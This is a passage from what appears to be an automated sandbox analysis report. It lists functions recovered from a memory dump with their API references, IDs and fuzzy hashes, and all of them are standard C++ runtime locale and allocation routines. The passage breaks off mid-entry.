                                                                                                            Function 6F06526E, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F065275
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F06527F
                                                                                                            • int.LIBCPMT ref: 6F065296
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • collate.LIBCPMT ref: 6F0652B9
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0652D0
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0652F0
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0652FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1767075461-0
                                                                                                            • Opcode ID: 4b1241b8bc4c35a26273466b66544aaa571e5da99d2668c6172e9ac88528fb8f
                                                                                                            • Instruction ID: bfba6a3835b7de6a82e11b8b7b866dc6816a335474f9b64537e95858fe8f70e9
                                                                                                            • Opcode Fuzzy Hash: 4b1241b8bc4c35a26273466b66544aaa571e5da99d2668c6172e9ac88528fb8f
                                                                                                            • Instruction Fuzzy Hash: 5B01D23590062A9BCF05DBA8CA41BBD77B2BF8532CF640509D4116B2D1DFB0AD568B91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F057290, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057297
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0572A1
                                                                                                            • int.LIBCPMT ref: 6F0572B8
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • messages.LIBCPMT ref: 6F0572DB
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0572F2
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057312
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F05731F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                            • String ID:
                                                                                                            • API String ID: 958335874-0
                                                                                                            • Opcode ID: 35e239dda2edad8f9132abae4db47df86a53a5e346d5ead9231e25299a22f9f6
                                                                                                            • Instruction ID: e6ca11e30031d57014657fe4e97dbd276ebba515dfb642ab132d52ef3b14c9f3
                                                                                                            • Opcode Fuzzy Hash: 35e239dda2edad8f9132abae4db47df86a53a5e346d5ead9231e25299a22f9f6
                                                                                                            • Instruction Fuzzy Hash: 2A01F971904629DBCF05DBA0CB447BD77B2BF85328F244409D8156F2C0CFB49A66D791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F057AB6, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057ABD
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057AC7
                                                                                                            • int.LIBCPMT ref: 6F057ADE
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • numpunct.LIBCPMT ref: 6F057B01
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057B18
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057B38
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057B45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3064348918-0
                                                                                                            • Opcode ID: ff333f64aab70917ea230f8ad207b552005763331920c1ccb3beb1141d28e5d0
                                                                                                            • Instruction ID: dee035636a7dac81a51ad0b213aff8f6f1227a1a2f33cc2f14ed4565957b1a2a
                                                                                                            • Opcode Fuzzy Hash: ff333f64aab70917ea230f8ad207b552005763331920c1ccb3beb1141d28e5d0
                                                                                                            • Instruction Fuzzy Hash: 1201D675900629DBCF05EBB4CA40BAD77B2BF85328F244509D4116B2C0DFF09A66D791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F051AD7, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F051ADE
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F051AE8
                                                                                                            • int.LIBCPMT ref: 6F051AFF
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • ctype.LIBCPMT ref: 6F051B22
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F051B39
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F051B59
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F051B66
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                            • String ID:
                                                                                                            • API String ID: 2958136301-0
                                                                                                            • Opcode ID: 376b4d12156d5b420846d4b78f0076d131578c0414fdca96d8e8bacae39e1e75
                                                                                                            • Instruction ID: 5fee2425237267b54dd5cca96799ed89621faf30b2dfcae144ee3ae3ba3a0f56
                                                                                                            • Opcode Fuzzy Hash: 376b4d12156d5b420846d4b78f0076d131578c0414fdca96d8e8bacae39e1e75
                                                                                                            • Instruction Fuzzy Hash: E301D671900729DBCF05DF64CB807AD77B2BF45368F240009D4116B2C0EFB0AA66C791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F057166, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F05716D
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057177
                                                                                                            • int.LIBCPMT ref: 6F05718E
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • ctype.LIBCPMT ref: 6F0571B1
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0571C8
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0571E8
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0571F5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                            • String ID:
                                                                                                            • API String ID: 2958136301-0
                                                                                                            • Opcode ID: 027f0bc2fcd78f528fce29aa341b3a81c34a5f6472aa1ab3b8646c38ba2b1d20
                                                                                                            • Instruction ID: e1f52d694555c755fa9e1f4c1d403b211e4e43ec9c70ce35af4a45c055ae37e1
                                                                                                            • Opcode Fuzzy Hash: 027f0bc2fcd78f528fce29aa341b3a81c34a5f6472aa1ab3b8646c38ba2b1d20
                                                                                                            • Instruction Fuzzy Hash: 6701D631900629DBCF05DBB4CB44BADBBB2BF85728F244109D8106B2C0DFB09A26DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0571FB, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057202
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F05720C
                                                                                                            • int.LIBCPMT ref: 6F057223
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • ctype.LIBCPMT ref: 6F057246
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F05725D
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F05727D
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F05728A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                            • String ID:
                                                                                                            • API String ID: 2958136301-0
                                                                                                            • Opcode ID: a2545f79be0f14359de3ed7f70506a8de425ff0d06fbd0571f1536c11c313373
                                                                                                            • Instruction ID: 6aa189af2952b3eb640092fd43162ae729459600c0add7792d49e0572e088f7c
                                                                                                            • Opcode Fuzzy Hash: a2545f79be0f14359de3ed7f70506a8de425ff0d06fbd0571f1536c11c313373
                                                                                                            • Instruction Fuzzy Hash: D701D2319006299BCF05DBA4CA44BAD77B2BF45328F244509E4116B2C0DFB4A962DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F05703C, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057043
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F05704D
                                                                                                            • int.LIBCPMT ref: 6F057064
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • collate.LIBCPMT ref: 6F057087
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F05709E
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0570BE
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0570CB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1767075461-0
                                                                                                            • Opcode ID: 19754c053f5bbc7d4105eda8964aca4eb1f9f6716fd97cd146eaaf1fb02d726c
                                                                                                            • Instruction ID: 332116c1f29563ccbc3be57d031799c5bb70a9a9ed0e73ee6e189d8480cc589b
                                                                                                            • Opcode Fuzzy Hash: 19754c053f5bbc7d4105eda8964aca4eb1f9f6716fd97cd146eaaf1fb02d726c
                                                                                                            • Instruction Fuzzy Hash: F501D631900629DBCF05EBA0CB44BAEB7B1AF45328F244509D415AB3C1DFB19A269792
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F051666, Relevance: 9.4, APIs: 6, Instructions: 380memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Allocate$Max_value
                                                                                                            • String ID:
                                                                                                            • API String ID: 4124748770-0
                                                                                                            • Opcode ID: 4d81fa068d56198766d7190474467bb0191700b91bc271ed62945861b234f042
                                                                                                            • Instruction ID: 2d2eafec24b268c7fb78cba3d49179746e4d7f8ba88237a51f237343bc1dec86
                                                                                                            • Opcode Fuzzy Hash: 4d81fa068d56198766d7190474467bb0191700b91bc271ed62945861b234f042
                                                                                                            • Instruction Fuzzy Hash: 16C17272900319FFDB14DFA9D880A9FBBBAFF45254B1005AAE814D7241D771EA11CBE1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F05E16B, Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 6F05E172
                                                                                                            • _Maklocstr.LIBCPMT ref: 6F05E1DB
                                                                                                            • _Maklocstr.LIBCPMT ref: 6F05E1ED
                                                                                                            • _Maklocchr.LIBCPMT ref: 6F05E205
                                                                                                            • _Maklocchr.LIBCPMT ref: 6F05E215
                                                                                                            • _Getvals.LIBCPMT ref: 6F05E237
                                                                                                              • Part of subcall function 6F05688C: _Maklocchr.LIBCPMT ref: 6F0568BB
                                                                                                              • Part of subcall function 6F05688C: _Maklocchr.LIBCPMT ref: 6F0568D1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                            • String ID:
                                                                                                            • API String ID: 3549167292-0
                                                                                                            • Opcode ID: 5f1613d908a44fe4e992e088a8d658f9b532a8a3e32ba0221b3b3006dfb9b6bb
                                                                                                            • Instruction ID: 5a86d52387b51dee96900d19db61df3489acb18be70ea900e9bcc43a13234524
                                                                                                            • Opcode Fuzzy Hash: 5f1613d908a44fe4e992e088a8d658f9b532a8a3e32ba0221b3b3006dfb9b6bb
                                                                                                            • Instruction Fuzzy Hash: 51219072D00318AADF18DFE4D944BDFBBA8EF05314F10845AF9199F285EBB49650CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F057D0A, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057D11
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057D1B
                                                                                                            • int.LIBCPMT ref: 6F057D32
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057D6C
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057D8C
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057D99
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: fdfb4ae31d2693942282c5d597cec981c3f98c55256a8df5c5499ca362ed31d9
                                                                                                            • Instruction ID: c03a86301e4a054cb40cdada7f53c1763b08520271e5d51d11faa0c13dbb6568
                                                                                                            • Opcode Fuzzy Hash: fdfb4ae31d2693942282c5d597cec981c3f98c55256a8df5c5499ca362ed31d9
                                                                                                            • Instruction Fuzzy Hash: 9001D27590062ADBCF05DBA0CA44BBD77B2BF85328F244609D4156B2C0CFB4A9269B91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F057579, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057580
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F05758A
                                                                                                            • int.LIBCPMT ref: 6F0575A1
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0575DB
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0575FB
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057608
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 4debb5bb45fde98561a4926a72b6a6cd8daf5cdaadc2d3855ed819c97ceb59b9
                                                                                                            • Instruction ID: 327a23c5ab9c9d18ca03bf7f89a846aa846b5f7ce6059afcdd6e0b8d33759c9a
                                                                                                            • Opcode Fuzzy Hash: 4debb5bb45fde98561a4926a72b6a6cd8daf5cdaadc2d3855ed819c97ceb59b9
                                                                                                            • Instruction Fuzzy Hash: 7701F9719006299BCF05DBA4CA447BD77B1BF45328F24440AD4116F3C0CFF4A962DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0655EC, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0655F3
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0655FD
                                                                                                            • int.LIBCPMT ref: 6F065614
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F06564E
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F06566E
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F06567B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 227dea0fc2bb8fb225aa1d30429c4e54ed3b876e18b471cf18234b9e7907a9a9
                                                                                                            • Instruction ID: 201d58da2ac1fc724ad4f6a899b619afd8bb750bcf199bc4360135ae88e8197d
                                                                                                            • Opcode Fuzzy Hash: 227dea0fc2bb8fb225aa1d30429c4e54ed3b876e18b471cf18234b9e7907a9a9
                                                                                                            • Instruction Fuzzy Hash: EA01F535900A29DBCF05DBB4CA40BBE77B2BF45328F640509E4116B3D1DFB0A916CB82
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F051C01, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F051C08
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F051C12
                                                                                                            • int.LIBCPMT ref: 6F051C29
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F051C63
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F051C83
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F051C90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 93c7a111db5e9e6dd2d964040096aa386973b358fa00a0838aee6125baa4de25
                                                                                                            • Instruction ID: 4c2e5f6bff7f2ffde2856ff0b13d1ff08e1df10b25a06ff09f4c318178a4042b
                                                                                                            • Opcode Fuzzy Hash: 93c7a111db5e9e6dd2d964040096aa386973b358fa00a0838aee6125baa4de25
                                                                                                            • Instruction Fuzzy Hash: 5601F9719006299BCF05DF60CA407BE7BB1BF45368F24050AD4156B2C0CFF1A925CB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F06542D, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F065434
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F06543E
                                                                                                            • int.LIBCPMT ref: 6F065455
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F06548F
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0654AF
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0654BC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 81d73de713980821b5fc915940440fb4e75f6c3ae378bcacba98e3cf710f8027
                                                                                                            • Instruction ID: 92c9fbe0ceb0580cb492a74c56ae02fec3d5d0d8c6e9060ca89af0900dd9cfe8
                                                                                                            • Opcode Fuzzy Hash: 81d73de713980821b5fc915940440fb4e75f6c3ae378bcacba98e3cf710f8027
                                                                                                            • Instruction Fuzzy Hash: 3801F535900729DBCF05DBA8CA44BBEB7B2BF45368F240049E4106B3D2CFB4A912CB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F05744F, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057456
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057460
                                                                                                            • int.LIBCPMT ref: 6F057477
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0574B1
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0574D1
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0574DE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 73418a04a99e7e89735d279c71686fd87aebd5bbb348029761f64d1e94b5209c
                                                                                                            • Instruction ID: 2ab87933d79d7eae56343785444881fc144aaf26259cd7668dc931dd2252c3bf
                                                                                                            • Opcode Fuzzy Hash: 73418a04a99e7e89735d279c71686fd87aebd5bbb348029761f64d1e94b5209c
                                                                                                            • Instruction Fuzzy Hash: E201D6319407299BCF05DB64CB447AD77B2BF45728F24440AE4146B2C0CFB19D66DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F057C75, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057C7C
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057C86
                                                                                                            • int.LIBCPMT ref: 6F057C9D
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057CD7
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057CF7
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057D04
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 876a6b7684fecec0d2ceed0498e7229f1d269c44ccb3d07fbe2d02d4cee5dc1b
                                                                                                            • Instruction ID: 71270e74e4297d0f0ceab9403f83b3897fda5d9badc92f18114b09448c045b67
                                                                                                            • Opcode Fuzzy Hash: 876a6b7684fecec0d2ceed0498e7229f1d269c44ccb3d07fbe2d02d4cee5dc1b
                                                                                                            • Instruction Fuzzy Hash: 1301267190072ADBCF01DBA4CB45BBD77B2BF45328F64004AD8106B2C0CFB09A22C791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0574E4, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0574EB
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0574F5
                                                                                                            • int.LIBCPMT ref: 6F05750C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057546
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057566
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057573
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 070fcb6c7e243f39434f294160aca3abd2a2f5d132cd5bda22a2f568ee74b1bc
                                                                                                            • Instruction ID: a4b6f69030437730628f76bb7049fb3453a484f6a3ac075b09522e06bb06ba05
                                                                                                            • Opcode Fuzzy Hash: 070fcb6c7e243f39434f294160aca3abd2a2f5d132cd5bda22a2f568ee74b1bc
                                                                                                            • Instruction Fuzzy Hash: 5401D23190462D9BCF05DBA0CA847AD77B2BF45368F644509D4106B3C1CFF0AA269B81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F051B6C, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F051B73
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F051B7D
                                                                                                            • int.LIBCPMT ref: 6F051B94
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F051BCE
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F051BEE
